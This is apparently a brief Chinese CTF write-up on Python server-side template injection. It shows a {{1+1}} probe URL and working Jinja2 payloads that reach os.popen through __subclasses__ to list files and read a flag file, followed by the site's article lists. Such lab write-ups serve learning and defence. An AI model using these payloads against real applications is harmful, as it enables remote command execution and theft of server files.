Web_python_template_injection
2024-08-24 04:01:33
0x01 pthon模板注入
判断是否为模板注入
paload
http://124.126.19.106:34164/{{1+1}}
//如果里面的值被执行了,那么存在模板注入
//调用os模块的popen执行ls打印所有文件
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("命令").read()}}
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("ls").read()}}
或者
//调用os模块的listdir打印文件
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir("./")}}
发现fl4g文件,读取文件
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("cat fl4g").read()}}
参考链接:
https://www.pythonf.cn/read/3573
最新文章
- 【C#】C#容易忽视的错误
- 批量另存mxd
- [JS] HTML QQ分享界面js代码
- 从一句SQL得出的启示
- Java多线程实现......(1,继承Thread类)
- Java+7入门经典 - 6 扩展类与继承 Part 1/2
- List转换成JSON对象报错(二)
- BZOJ4423 Bytehattan
- [Winfrom] 使用一个启动快捷方式,打开2个不同的窗体并且共用一个缓存空间
- ubuntu16.04LTS更换阿里源
- python 关闭垃圾回收
- java静态代码块、普通代码
- 20172308 实验四《Java面向对象程序设计 》实验报告
- linux升级php至5.6
- Python的知识点 plt.plot()函数细节
- Android——单例模式
- 「PKUWC2018」Slay the Spire
- 2015526 《Java程序设计》实验二实验报告
- [实战]MVC5+EF6+MySql企业网盘实战(18)——文件上传,下载,修改
- node.js发http请求
热门文章
- 痞子衡嵌入式:简析i.MXRT1170 Cortex-M4 L-MEM ECC功能特点、开启步骤、性能影响
- python爬虫面试题集锦及答案
- js输入框练习
- 0day堆(2)堆的调试实验
- 几年前的今天,Google发了这几篇“大”新闻
- 腾讯技术工程 | 基于Prophet的时间序列预测
- 难道你现在还不知道:C/S和B/S
- codeforce 1311 C. Perform the Combo 前缀和
- P2290 [HNOI2004]树的计数(bzoj1211)
- python(MD5 单向加密)